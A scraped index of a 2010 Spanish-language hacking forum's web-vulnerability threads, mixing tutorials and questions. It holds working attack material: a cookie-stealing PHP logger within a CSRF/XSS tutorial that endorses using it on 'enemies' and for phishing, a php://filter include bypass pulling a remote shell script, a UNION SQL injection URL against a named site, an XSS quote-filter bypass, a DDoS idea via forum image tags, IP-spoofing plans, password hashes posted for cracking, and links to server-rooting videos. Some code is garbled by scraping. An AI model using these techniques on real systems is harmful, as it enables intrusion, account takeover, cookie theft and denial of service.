- Vulnerabilidades Nivel Web General

Insegure cookie handling y Remote command execution (3 replies)

seth — Tue, 07 Sep 2010 07:36:18 -0400

Como loguearse en un panel de admin por un error de logica en la aplicacion y como ejecutar comandos por un mal filtrado de lo que se escribe en un archivo .php

DDos through HeavyQueries & img tags (5 replies)

tragantras — Sat, 21 Aug 2010 07:56:17 -0400

Tras este título tan "pomposo" se encuentra una idea muy sencilla, así que no se dejen engañar pero no se me ocurria otro mejor xD
Antes que nada aclarar, que es una idea teórica, ni siquiera probada su efectivida, pero que teoricamente debería funcionar bien, sin más comienzo:

Cuando se introduce un tag bbcode [ img ] es traducido mediante phpbb (o smf o la suite que tengamos instalada( en un etiqueta html de tipo

Language: HTML
<img src="...">

. Esto por nuestro explorador conlleva una petición GET al servidor en el cual esté alojada la imagen. Aunque no tenga el mimetype adecuado, la petición se realiza, por lo que podríamos, por ejemplo, poner este pedazo de codigo

Language: HTML
<img src="http://servidor.com/consultaSQL.php?id=XXX">

Supongamos que servidor.com/consultaSQL.php es vulnerable a un ataque SQLi, podríamos realizar una consulta pesada, como listar todos los elementos de la tabla usuarios ( supongamos más de 1000 usuarios ) o listar recursoso o cualquier consulta pesada. Además si situamos esta consulta en un foro muy transitado (mediante el bbcode [ img ] [ /img ] ) puede dar lugar a MUCHAS consultas de este tipo, lo que sin duda, acarreará una carga desmesurada en el servidor objetivo, con la particularidad, de que dado que las peticiones GET provienen de PCs con distintas IPs y sin ninguna relación, sería MUY dificil detener este ataque.

Que pensais? Factible o No? :O

HttpOnly Mecanismo de seguridad para evitar el robo de cookies (4 replies)

yoyahack — Tue, 03 Aug 2010 10:42:19 -0400

Buenas, HttpOnly es un mecanismo de seguridad que sirve para evitar la escritura/lectura de cookies en lenguajes que se ejecutan al lado del cliente, como puede ser JavaScript.

Ej:

ej.php

Language: PHP

 
//Verificando la version necesaria
if(!version_compare(substr(phpversion(), 0, 6), '5.2.0', '>=')){
echo "Para poder usar la directiva session.cookie_httponly, se necesita una version de PHP 5.2.0 o mayor";
exit;
}
 
//Verificando que la directiva este ON
if(!ini_get('session.cookie_httponly')){
echo "Active la directiva session.cookie_httponly del php.ini";
exit;
}
 
if(!empty($_POST['text']) || !empty($_COOKIE['text'])){
setcookie('text','Yoyahack', time()+3600, '/ej/','127.0.0.1',false, true);
echo $_POST['text'];
exit;
}
?>

Función setcookie()

setcookie ( Nombre de la cookie, Valor de la cookie, Tiempo de vida, Ruta de la cookie en que funcionara o estará disponible, Dominio en que funcionara la cookie, Si la cookie deberá funcionar en conexiones HTTP Seguras (HTTPS) (Valor Bool), HttpOnly (Valor Bool) )

Nota: Para usar el parametro HttpOnly, hay que activar la directiva session.cookie_httponly del php.ini y que el navegador soporte HttpOnly.

Navegadores que soportan HttpOnly (Owasp).

Bueno, ahora tratamos de leer las cookies con javascript.

Miramos las cabeseras Http

http://127.0.0.1/ej/ej.php


POST /ej/ej.php HTTP/1.1

Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.8pre) Gecko/20100704 Ubuntu/9.10 (karmic) FireDownload/2.0.1 Namoroka/3.6.8pre
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://127.0.0.1/ej/ej.php
Cookie: text=Yoyahack
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
text=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

HTTP/1.1 200 OK
Date: Wed, 14 Jul 2010 00:36:22 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.4
Set-Cookie: text=Yoyahack; expires=Wed, 14-Jul-2010 01:36:22 GMT; path=/ej/; domain=127.0.0.1; httponly
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 55
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

text=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Enviamos el contenido via POST para luego mostrarlo, esta codificado porque apache codifica los parámetros que se envían vía GET/POST y luego lo decodifica.

Set-Cookie: text=Yoyahack; expires=Wed, 14-Jul-2010 01:36:22 GMT; path=/ej/; domain=127.0.0.1; httponly

Enviamos la cookie con el parámetro httponly.

Salida:

No se muestra la cookie xD....

Aunque HttpOnly solo sirve para evitar la lectura o escritura de cookies en lenguajes que se ejecutan al lado del cliente y nomas, aunque esto no se aplica en lenguajes que se ejecutan al lado del servidor, osea que no es del todo seguro xD.

Saludos...

video tutorial rooteo servidor 2.6.9.21 2007 by syskc0 (no replies)

syskc0 — Sat, 10 Jul 2010 21:24:09 -0400

hola amigos

hola amigos aqui les traigo un video donde les enseño a rootear un kernel 2.6.21 2007
http://www.multiupload.com/QSRK95B9ZR
password:c-intrud3rs.com

company: syskc0

video tutorial rooteo servidor 2.6.26 2009 by syskc0 (1 reply)

syskc0 — Fri, 06 Aug 2010 17:11:47 -0400

hola amigos

hoy les hice un video tutorial donde rooteo un kernel 2.6.26 2009
http://www.multiupload.com/XJ48TFN11J
password:c-intrud3rs.com

video tutorial subir shell sql injection by syskc0 (1 reply)

syskc0 — Sun, 11 Jul 2010 15:35:36 -0400

[FONT="Courier New"]hola amigos[/FONT]

hoy les traigo un video que he hecho donde les enseño como subir una shell por medio de sql injection

http://www.multiupload.com/TDY8VFMI9W
password:c-intrud3rs.com

espero que lo disfruten

video tutorial rooteo servidor 2.6.9 2005 by syskc0 (no replies)

syskc0 — Sat, 10 Jul 2010 21:21:10 -0400

hola amigos

hoy les he hecho un video donde les enseño como rootear un kernel 2.6.9 2005
http://www.multiupload.com/MCB3P0E8RH
password:c-intrud3rs.com

by syskc0

TCP sequency number prediction (5 replies)

tragantras — Sat, 03 Jul 2010 11:41:44 -0400

Hola foreros =)

Presentacion del temita
Os expongo la idea que he estado pensando y decidme que os parece^^:

Existe cierta página con cierto sistema de votación, cuyo mecamismo es el siguiente, mediante una uri del estilo:

Language: HTML
http://www.web.com/encuesta.php?id=32&puntos=10

Damos 10 puntos al usuario 32, ésta web implementa un sistema de protección por el cual, tan solo 1 IP por dia puede votar (para hacer más "justas" las cosas).

Trasteando con el wireshark (mi fiel amigo jaja), me he fijado que el servidor en donde corre la web, empieza toda transacción con el SN: 0. (me ahorro las explicaciones, supongo que a estas alturas todos sabreis lo que es). Como se puede observar constituye un flag tremendo, dada la triviliadidad de la predicción del mismo.

Se podria implementar un sistema de spoofing IP de la siguiente manera:

[aclaracion, pongo el paquete y entre parentesis los campos a destacar)

[ three way handshake ]

CLIENT SIDE.............................................................................................................SERVER SIDE

SYN (sn: random, ack: 0, IP source: "spoofed ip") ----------> (el server recibe el intento de conexion y manda un syn, ack )
<-------(sn:0, ack:1, ip dest: "spoofed ip")---- (este paquete no me llega a mi, sino a la ip SPOOFED)
ACK (sn: random+1, ack: 1, IP source: "spoofed ip") ---------> (en este punto el servidor cree que la IP spoofed ip establecio la conexion correctamente)

[ Haciendo el request ]

GET /encuesta.php?id=32&puntos=10 HTTP/1.1
(sn: random+1, ack:1, len:400 IP source: "spoofed ip") -------->
<----(sn: 1, ack: 400+1+random, IP dest: "spoofed ip")----- el server nos contesta con un ACK

Implicaciones

Hemos conseguido hacer un voto suplantando una IP. (supuestamente)

Problems problems!

Aqui es donde necesito vuestra consulta y "oh gran sabiduria" xD. Se que en algunos sistemas, al recibir la ip falseada ese paquete "syn ack" del servidor, puede que mande un "rst" y se vaya todo al garete o, que tenga que hacer una condición de carrera contra esa IP, no lo sé. Qué pensais vosotros? xD

PD. se que me explico como el culo, pero yo soy d numneros... jajaja

PD2: un saludo =)

Crackear Hash Mysql de 160bit. (2 replies)

heifede — Sun, 20 Jun 2010 15:40:30 -0400

Bueno como dice el titulo no saben como puedo hacer para crackear una password que esta encriptada con el hash de Mysql 160 bits?

PW ENCRIPTADA: *7AD4747A0838369B08AFA00254E69017D066AD5E
este es el hash el que pueda que lo desencripte y si no dejen link de algun tool o algo por el estilo.. Muchas gracias.

Comilla en formulario (21 replies)

tragantras — Sat, 19 Jun 2010 17:17:12 -0400

Hola amigos :) (mi segundo post, qué emocion jajaja)

Bueno, cierta web vulnerable a una injeccion MSSQL mediante método POST, reflecta la cadena maliciosa, siendo por lo tanto, un flanco para un XSS. La condición para que refleje la cadena es la insercción de una comilla simple -> ' <- seguida de una comilla doble -> '" <- más la cadena a reflejar, por ejemplo:

Language: PHP
'">

el problema viene con lo siguiente... si armo el formulario para aprovecharme de ese xss, la comilla y la doble comilla se codifica a url pasando a ser %27 no haciendo saltar la alerta de la base de datos y no reflejando el xss...

Existe alguna manera de insertar la comilla tal cual en el formulario ?? :)

Un saludo y gracias ^^

Update you with using poison null byte. (5 replies)

pancho — Mon, 31 May 2010 05:00:49 -0400

Esta tenica es muy interesando para salta los filtros de Imagenes como jpg.

TODAVIA NO SE SI FUNCIONA EN MYSQL pero en MSSQL FUNCA

http://www.insomniasec.com/publications/0x00_vs_ASP_File_Uploads.pdf

Denial of Service in RegExp (4 replies)

SH4V — Thu, 13 May 2010 16:49:07 -0400

Paper sobre reDoS:

http://n3t-datagrams.net/papers/reDOS-n3t-datagrams-by-SH4V.pdf

Saludos!

Paper sobre lfi (1 reply)

seth — Wed, 21 Apr 2010 15:31:00 -0400

http://packetstormsecurity.org/papers/general/lfi-paper.pdf

Bypass de filtros de rfi con php://filter (3 replies)

seth — Wed, 21 Apr 2010 12:07:24 -0400

Pongamos de ejemplo este filtro:

Language: PHP

$archivo = $_GET["a"];
if((strtolower(substr($archivo,0,7))=="http://") or (strtolower(substr($archivo,0,8))=="https://") or (strtolower(substr($archivo,0,6))=="ftp://") or (strtolower(substr($archivo,0,1))=="/") or (strstr($archivo,'../')!==false))
{
    echo "GTFO";    
}
else
{
    include($archivo);    
}
?>

Bypass: http://localhost/test.php?url=php://filter/resource=http://host/emelco/emelco-1.3.php
Mas info: http://us2.php.net/manual/en/wrappers.php.php
Funciona desde php 5.0.0 con allow_url_include = On

Hasta ahora no vi que nadie lo use ni lo filtre :D

SQLI en Mysql 4.x (11 replies)

nuevaorden — Thu, 25 Mar 2010 00:47:09 -0400

Salu2 compañeros,

Tengo un problema o una duda,

Vale en esta web tengo:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

Ya que hay 36-

La versioón del Mysql es : 4.1.22
La base de Datos: qar139

El tema es , intento sacar mas info como por ejemplo las tablas, pero me saca error , porque creo que me baso en Mysql 5x ,pero nose como hacerlo para Myql 4x

Lo que intento es esto:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.tables--

Y me da este error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75

alguien sabe como hacer la quiery correcta para mysql 4x???

Gracias
Respuesta

Duda formulario vulnerable (8 replies)

Escenc3 — Wed, 03 Mar 2010 08:44:08 -0500

Bueno me estaba por olvidar de colocar este texto, deseo hacer invulnerable el envio de comentarios ya que es hackeable.

Estoy navegando por proxy xq no tengo internet voy a ser breve porque al enviar muchos datos se me cuelga internet, sin mas preambulos que habia puesto antes les paso el codigo.

sendmessage.php

Language: PHP

if(empty($username))
{	
	header("location:index.php");
}
$tousername=$username;
$errO=false;
if($username==$ses_username)$errO=true;
?>


   
     

        

        

      
    
      
      
         
           
		  
		  if(!$errO)
		  {
		  ?>
              print$tousername;?>">
                  
                
                      
                     
                    Send a message 
                      to  print $tousername;?> 
                  
                   
                     
                    Subject
                     print $subject; ?>" size="40">
                  
                   
                     
                    Message
                    <span class="sy1"><?</span> <span class="kw1">print</span> <span class="re0">$message</span><span class="sy0">;</span> <span class="sy1">?></span>
                  
                   
                     
                    
                  
                
              
			  
			  }
			  else
			  {
			  ?>
			  print$photoid;?>">
                  
                
                      
                    You cannot send 
                      a message to yourself!
                  
                
              
			  
			  }
			  ?>

checksession.php

Language: PHP

if(empty($ses_username))
{
	$extra="";
	if(isset($repusername))$extra="&repusername=$repusername";
	if(isset($rphid))$extra="&rphid=$rphid";	
	header("location:index.php?cmd=3$extra");
} 
?>

Index.php

Language: PHPcase 12:$file="postcomment.php";
				$rphid=$phid;
				include("checksession.php");
				if(isset($comment))
				{
					$approved=getSetting("APPROVECOMMENTS");
					$sql="insert into comments(comment,photosid,byusername,approved,postdate) values('$comment',$phid,'$ses_username','$approved',now())";
					newCommentPosted($ses_username,$phid);
					$res=mysql_query($sql);
						$mheading="Comments saved";
						$mmessage="Your comments has been saved!";
						$file="displaymessage.php";					
				}
				break;

displaymessage.php

Language: HTML
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                <form name="myform" action="index.php?cmd=5" method="post" onsubmit="javascript: return checkifvalid();">
                  <tr > 
                    <td width="5"  class="header"> </td>
                    <td width="100%" height="20" colspan="2" class="header"></td>
                  </tr>
                  <tr > 
                    <td width="5" height="25" class="normal"> </td>
                    <td height="25" colspan="2" class="normal"></td>
                  </tr>
                </form>
              </table>

Lo habia divido la vez anterior para que sea entendible pero mi internet no anda muy bien sepan disculpar y gracias de ante mano por tomarse el tiempo de leer el codigo.

Duda sobre bypassear un WAF con XSS (9 replies)

prodigy — Thu, 13 May 2010 10:02:37 -0400

Bueno tengo una duda con un supuesto XSS en una pagina web, resulta que he inyectado en el buscador del web un simple alert y me ha salido un cartel diciendo que se habia detectado un ataque XSS y que mi peticion habia sido bloqueada, entonces mi duda es la siguiente... ¿Es posible que el buscador de la pagina web no sea vulnerable y sea una medida de seguridad extra? ¿Y si fuese vulnerable, que formas habria para poder bypassearlo?, creo que hace tiempo vi un tutorial en el que se explicaba como bypassear los filtros de un waf con SQL y XSS pero no lo encuentro... :(

Saludos!!

consulta hash (2 replies)

DTH R4Z13L — Tue, 16 Feb 2010 19:56:28 -0500

Estimados.
acudo a ustedes para preguntar a que tipo de hash correponde esto:

*A4EF9FD509AC50C9C8C8272CAEC7733E3BB8C913

esto esta estraido de una base de datos en mysql la version es 5.0.51a-3ubuntu5.4 e tratado de crackerarla con md5shear t con cain pensando que es md5 pero me dise que la longitud no corresponde si alguien me podria orientar se los agradeceria mucho

Bypass de magic_quotes_gpc() para explotar XSS via POST y Cookie (12 replies)

yoyahack — Wed, 17 Feb 2010 01:29:54 -0500

Buenas, algunas veces necesitamos explotar un XSS via GET o via POST, pero nos no dejas porque al parecer tienen ON la directiva magic_quotes_gpc (Get, Post, Cookie), que nos escapa las comillas dobles y simples a barras invertidas, esto puede ser un problema al principio pero esto se puede bypassear con la función String.fromCharCode(), ahora sito el texto:

Este es un método global del objeto String que crea una cadena a partir de los
códigos Unicode  que se le pasen como parámetros.

Bueno, para resumir, para poder explotar las magic_quotes_gpc, solo es necesario insertar un código javascript que no contenga comillas dobles y simples, para esto nos ayudara la función de javascript String.fromCharCode().

Bueno, primero debo saber si tengo la directiva On en el php.ini

root@yoya-desktop:/# cat /etc/php5/apache2/php.ini|grep magic_quotes_gpc
magic_quotes_gpc = On

Con esto ya sabemos que tenemos la directiva magic_quotes_gpc On.

Nota: Apartir de PHP 5.3.0 la directiva magic_quotes_gpc viene por defecto Off y apartir de la versión 6 de PHP sera eliminada.

Explotaremos el siguiente archivo:

Language: PHP

/*Explotando XSS con magic_quote_gpc ON*/
 
$var = $_POST['form1'];
$var2 = $_POST['form2'];
 
if(!empty($var) && !empty($var2))
{
   echo "El primer valor es: ", $var;
   echo "
";
   echo "El segundo valor es: ", $var2;
   exit;
}
?>

Ingrese el primer parametro

Ingrese el Segundo parametro

Ok, luego presionamos enviar y aparecerá lo siguiente:

El primer valor es: \"Probando \"comillas dobles\"
El segundo valor es: \'Probando comillas simples\'

Podemos ver que nos a escapado las comillas dobles y simple con barras invertidas,
ok, si ponemos en el formulario, ok ahora usaremos la funcion String.fromCharCode() para pasar los parámetros necesario para ejecutar XSS pero lo tendremos que pasar en ascii, tengo hice una herramienta en perl para su uso.

Language: Perl
#!/usr/bin/perl
#Code by Yoyahack
#yoyahack.blogspot.com
#Undersecurity.net 
 
if(!$ARGV[0]){
print "Usage perl $0 \n";
print "Ex: perl $0 yoyahack\n";
exit;
} 
print "La cadena convertida a ASCII es:\n"; 
$a = '';
print join ',', unpack "U*", $a;
print "\n";
exit;

Ok, la vamos a pasar y vamos a pasar el siguiente parametro a la tool en perl:

Y nos devolverá:

60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,66,117,101,110,97,115,44,32,101,115,116,111,32,101,115,32,117,110,32,101,106,101,109,112,108,111,34,41,60,47,115,99,114,105,112,116,62

Ok ahora insertamos lo siguiente en el formulario:

Y el resultado:

Como afecta magic_quotes_gpc para el envió de cookies.

Ok, tenemos el siguiendo source php.

Language: PHP

/*Como afecta la directiva magic_quotes_gpc a las cookies*/
if(isset($_COOKIE['xss']))
{
    echo "La cookie del usuario es: 
".$_COOKIE['xss'];
    exit;
}
 
if(!empty($_POST['campo']))
{ 
    setcookie("xss", $_POST['campo']);
    exit;
}
?>

Rellene el campo

Ok, primero llenamos un formulario y los datos ingresados en el serán usado como cookies.

Luego se ejecutara esta linea:

Language: PHP

if(isset($_COOKIE['xss']))
{
    echo "La cookie del usuario es: 
".$_COOKIE['xss'];
    exit;
}

Significa que si la cookie llamada "xss" contiene un valor se ejecuta el if(), luego se muestra la cookie y se finaliza el script para que no siga.

Al precionar enviar, el valor de la cookie XSS sera:

Hay vemos que nos han dañado la cookies, tambien podemos ver las cookies de la web.

El contenido de la cookie xss es:

%5C%22Cookie+que+se+%5C%27usara+%5C%22

Esta en url encode y al pasarla por url decode el resultado sera:

\"Cookie que se \'usara \"

También se puede ejecutar javascript solo si la web imprime el valor de la cookie, aunque las cookies no son para estar imprimiendo su valor y mayormente la pasan por md5() o por base64, pero siempre hay alguien que hace la exepcion .

Saludos.

todos los videos y papers de milw0rm (no replies)

snake875 — Sun, 14 Feb 2010 00:24:30 -0500

http://rapidshare.com/files/308789411/milw0rm_papers_by_01hero.rar

http://rapidshare.com/files/309396927/milw0rm_videos1to31_by_01hero.rar

http://rapidshare.com/files/309271337/milw0rm_videos31to51_by_01hero.rar

http://rapidshare.com/files/309181945/milw0rm_videos52to79_by_01hero.rar

http://rapidshare.com/files/308877563/milw0rm_videos80to_100by_01hero.rar

http://rapidshare.com/files/309515937/milw0rm_videos101to104_by_01hero.rar

http://rapidshare.com/files/309516982/01hero.nfo

fuente: https://neworder.box.sk/forum/topic41313-milw0rm-papers-and-videos-rapidshare-links.html

bueno amigines se los merecen por ser un gran comunidad informatica por siempre under security y muchismas grasias a todo

[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits] (5 replies)

Zero_Bits — Fri, 12 Feb 2010 16:32:10 -0500

No se si lo postee aki peor: Este tuto lo hice hace mucho colaborando una parte con mi amigo "ShadinessDark", tuto por mi del cual se baso "GUSON", comparenlos xDD, aunk el mio lleva mas time =):

Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits

1.) Presentación

2.) Que es CSRF

3.) Quien descubrió la vulnerabilidad CSRF

4.) CSRF y Xss

5) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits

6.) Testeando vulnerabilidad CSRF y programas el code vulnerable

7.) Sacando una conclusión a todo

8.) Como cuidar nuestra Web de este tipo de ataques

9.) Despedida

1.) Presentación

Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial
Para dar la diferencia de otros tutoriales que he visto en la red…

¿Por qué diferente?

Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados

¿A que se debe este tutorial?

Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo
No es mi culpa que un Web Master no me haga caso ¿Verdad?

Los saludos más especiales para mis compañeros:

Zero Bits
KuTer
Jeferx
Darki113r
_84kur10_
Z1z30f
Kozmic.Kizz

2.) Que es CSRF

Bueno como muchos quizás han leído en la wikipedia ya csrf representa a
Cross Site Request Forgery el ataque se efectúa cuando por ejemplo Vemos algo
Así Presiona este link para que te lleve a mi sitio
Siempre el atacante usa como victima a un usuario que le brinda confianza la Web.
Los que tenemos foros sabemos que cada usuario tiene como destino un perfil donde
Cambiamos contraseña – email – nombre de usuario y otras cositas casi siempre el Atacante usa un código malicioso para hacer una petición en {GET – Post – HTTP}
Con esta vulnerabilidad el atacante le puede cambiar a la victima su información de PERFIL.

3.) Quien descubrió la vulnerabilidad CSRF

En el 1988 Hardy Norma publico un documento que explique una solicitud cuestión nivel de confianza que llamo un
Diputado confuso. En 2000, un correo a bugtraq explico Zope fue afectado por un problema confuso
Web diputado que se define hoy como una vulnerabilidad CSRF mas tarde en el 2001 Peter Watkins publico una entrada
En la lista de correo bugtraq acuñar el termino CSRF en respuesta a otro hilo titulado
Los peligros de permitir a los usuarios colocar imágenes en los sitios Web.

Bueno sobre quien lo descubrio ese credito si no me toca a mi esa parte es de Aqui solo lo logre traducir...

4.) CSRF y Xss

Quizás muchas personas nos preguntamos o se preguntan si esta vulnerabilidad
Es parecida o igual a xss.

Les explico bueno xss se aprovecha de la confianza de la victima que tiene el sitio
Web o aplicación el usuario lea ae contenido que aparece en su navegador que esta destinada y representada por el sitio Web que se esta viendo.

El csrf se aprovecha de la confianza que el sitio tiene para la victima ósea usuario…

4.1) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits

Bueno hay un metodo en XSS que algunos amigos me han dicho que se parece a el XSRF o CSRF, que son el ROBO DE COOKIES EN XSS y el CSRF, la verdad es que no ya que, el robo de cookies por xss como su nombre lo indica roba las cookies de cualquier usuario o administrador del sitio y el CSRF se encarga de ROBAR, VER y CAMBIAR cualquier informacion dependiendo de la victima que caiga.

Vamos a ver un ROBO DE COOKIES EN XSS y un ataque CSRF clasico, para que vean un poco la diferencia...

- ROBO DE COOKIES EN XSS

Primero tendriamos que saber si el server es vulnerable a XSS o tambien podriamos probar que el code
URL y IMG en foros
no filtre bien el contenido que se le asigne.

Para algunos que no entienden lo de URL y IMG es cuando dentro del URL agregariamos un link como

Language: Javascript
javascript:alert("xss")

y cuando se le de click se ejecute hay mismo, tambien podriamos agregar XSS con codes HEXADECIMALES (ya esto es otro tema, asi que no lo explicare).

Bueno, en otro servidor aparte (que seria el nuestro) codeariamos un programa en PHP que se encargue de recibir al usuario victima y robarle las cookies apenas entre (Para esto se necesita saber por lo menos PHP BASICO)

Language: PHP

$cookie = $_REQUEST[cookie];
$file=fopen("cookies.txt", "a");
fput($file, "$cookie\n");
fclose($file);
?>

PD: Este code no es mio es de Chebyte. Pero esto es basico...

Bueno, le explicare el code para quienes no lo entiendan:

$cookie = $_REQUEST[cookie] : El que recibe la cookie
$file=fopen("cookies.txt", "a") : Crea el archivo cookies.txt para lectura
fput($file, "$cookie\n") : Muestra la cookie
fclose($file) : Cierra

Podriamos guardarlo "robador.php" y ahora faltaria el code que redireccione a este CODE:

Y Tachan! tienes la cookie...

Bueno antes que nada les dire lo SCRIPT KIDDIE y BUENO de este metodo:

1. SCRIPT KIDDIE: Usar este metodo contra webs de Hacking
2. NO-LAMMER: Usar contra sites malos como: Porno, Pedofilia, Estafadores, Enemigos, EMOS!!!, etc..
3. SCRIPT KIDDIE: Aprender este metodo unicamente sin saber como funciona
4. NO-LAMMER: Aprender JAVASCRIPT, HTML y PHP
5. MEDIO: Usarla para Phishing [Es malo y es bueno xD, pero no es lammer]
5. SCRIPT KIDDIE: Hacking MSN -.-"

Ahora pasaremos a hablar del CSRF clasico:

- XSRF/CSRF Clasico

Bueno ahora usaremos una forma de XSRF clasico, pero no de robo si no de CAMBIO de datos, que seria primero como dije probar si el server es vulnerable a JAVASCRIPT, o si no filtra bien el contenido de los BBCODES, o los inputs mal programados, o tambien podriamos atacar normal, sin que el usuario sepa que es un ataque.

Podriamos atacar sin que la victima sepa que es malo asi (dependiendo de la pagina):

Language: Javascript

Como dije depende de la web, SI EL SITE NO TIENE AL CAMBIAR DATOS, REPITE EL EMAIL o CONTRASEÑA es vulnerable y tambien de los input "name=NOMBRE" del site. La victima no sabe que le hemos cambiado el email...

Tambien si al cambiar datos salga un link como este:

Quote

http://www.web.com/perfil.php?user=NOMBREUSUARIONUEVO&mail=minuevomail@hotmail.com&pass=minuevopass

Es super hiper mega vulnerable ya que notamos que no dice en el link a cambiar: PASSANTERIOR o EMAILANTERIOR... y que pasa si le mandamos un MP (Mensaje Privado) depende claro si es un foro con un link como este:

Man vota por mi

AQUI

Y al hacer click en cualquiera de los ejemplos los datos han sido cambiados..

Espero que les haya gustado mi parte en este bonito tutorial creado por mi bro ShadinessDark y puedan entender la diferencia entre XSS (El robo de cookies) y CSRF...

5.)Testeando vulnerabilidad CSRF y programas el code vulnerable

Los ataques csrf lo reproducen por etiquetas HTML/JAVASCRIPT o una
Imagen, daré un breve ejemplo:

Un ejemplo nos envían un correo electrónico o un MP en algún foro cuyo propósito
Del atacante es que al darle clic realiza una solicitud a una URL del atacante les Mostrare un ejemplo:

Por ejemplo usando una imagen src.

Script

También se puede hacer por XHTML pero hay que usar IE y bueno esa no se las explicare en este tutorial y si quieren me avisan y bueno lo modifico, Claro que existen muchas formas Vbscript – Actionscript – HTML – Javascript - JScript y otros que utilizan de marcado en los navegadores de los usuarios que hacen
Realizar peticiones REMOTAS.

¿Cambiando datos de la victima?

Bueno este breve codigo es solo un pequeño ejemplo:

Como podemos ver en este código hacemos una petición a POST
Acuérdense que arriba les comente que cuando el atacante usa un código
Malicioso hace una petición en Get. Post y HTTP ¿Se acuerdan? Espero y me vayan entendiendo...

¿A dónde se dirige esta petición?

Bueno esta petición se dirige a la base de datos del sitio me explico
Cada vez que hacemos cambios extremos en nuestro perfil todo pasa
Por una base de datos bueno cuando la victima le da clic a la url enviada
Por el atacante hace una petición en la base de datos y cambia los datos de la cuenta
De la victima de confianza por el atacante ¿Me van entendiendo a que se debe este ataque?

7.) Sacando una conclusión a todo.

Mirando la lógica a todo este ataque se basa en un código malicioso que es muy usado, HTML Y Javascript.

Es un tipo de ataque que por parte de HTML usamos la etiqueta src y en javascript Usamos la misma etiqueta este ataque es basado en darle clic a un vinculo al Redireccionar la Web y cargar cambia la información que de nuestro usuario.
Haciendo una petición en la base de datos del código del atacante…

8.) Como cuidar nuestra Web de este tipo de ataques

Primero que nada vamos a nuestro FTP introducimos nuestros datos y entramos a la Carpeta public_html o donde este el archivo index.php le añadiremos algo que diga
‘Actualcontraseña’ Antes de seguir el código que pondré es sacado de la siguiente pagina De aquí

Después que estemos en el index.php introduciremos este código con el Actualcontraseña esto tiene que ir dentro de
Usuario Email Contraseña Email alternativo: Contraseña Actual:

Luego buscamos el archive que se llama Config.php lo pueden encontrar
Por el mismo FTP y le agregamos lo siguiente:

En el archive datos.php usaremos lo siguiente:

Ahora vamos a nuestro panel entramos a PHPMYADMIN ósea a nuestro phpmyadmin
Y le damos donde dice Consulta y introducen el siguiente código:
CREATE TABLE `myhosting_usuarios` ( `id` int(11) NOT NULL auto_increment, `usuario` varchar(15) NOT NULL, `email` varchar(15) NOT NULL, `emailalternativo` varchar(15) NOT NULL, `contraseña` varchar(150) NOT NULL, `contraseñaa` varchar(150) NOT NULL, KEY `id` (`id`) ) ENGINE=MyISAM; INSERT INTO `myhosting_usuarios` VALUES (1, `SecurityKill`, `mymail@gmail.com`, `mymail2@gmail.com`, `mypass`, `mypass`);

9.) Despedida

Bueno señores ya hemos terminado este tutorial quizás muchos no entendieron
Y otros si me entendieron traten de hacer lo mejor por dar una buena explicación
Pero recuerden que no todo se pone tan fácil, Bueno en este tutorial compartí gran
Parte con mi hermano zero bits que su parte quedo maravillosa lo se porque lo lei
Me gustan las críticas así que espero las críticas tutorial escrito a mano todo los derechos del autor reservados y los códigos no todos son nuestros por eso hemos
Puesto en algunos la fuente les deseo un gran fin de semana…

No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que
Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…

Group’s Ethical.

Zero Bits
KuTer
Jeferx
Darki113r
_84kur10_
ShadinessDark

Mi team V1rtu@l VIRu$ Bl@ck Team

Explotar Source Code Discloure (5 replies)

Guason — Thu, 04 Mar 2010 18:36:39 -0500
Explotar Source Code Discloure

Autor:El Gran Guasón

Indice:

0x01:Introducción
0x02:Ejemplo de aplicacion vulnerable
0x03:Como atacar
0x04:Despedida

0x01:Introducción

Hola hoy les voy a explicar la vulnerabilidad conocida como Source Code Discloure algo olvidada
o deconocida para algunos.Con esta se logran leer o descargar archivos del directorio tales como
archivos php o archivos de texto , todo depende de la imaginacion.
Pero en este manual la aplicacion vulnerable sera un descargador de archivos.

0x02:Ejemplo de aplicacion vulnerable

Entonces mi ejemplo de aplicacion vulnerable sera una pagina que descargar archivos como dije
anteriormente. Asi que aca tiene el codigo en php

Language: PHP
============================descarga.php=================================================== if (isset($_GET['descargar'])) { $ar=$_GET['descargar']; if ($ar == " ") { echo "
Debes seleccionar un archivo
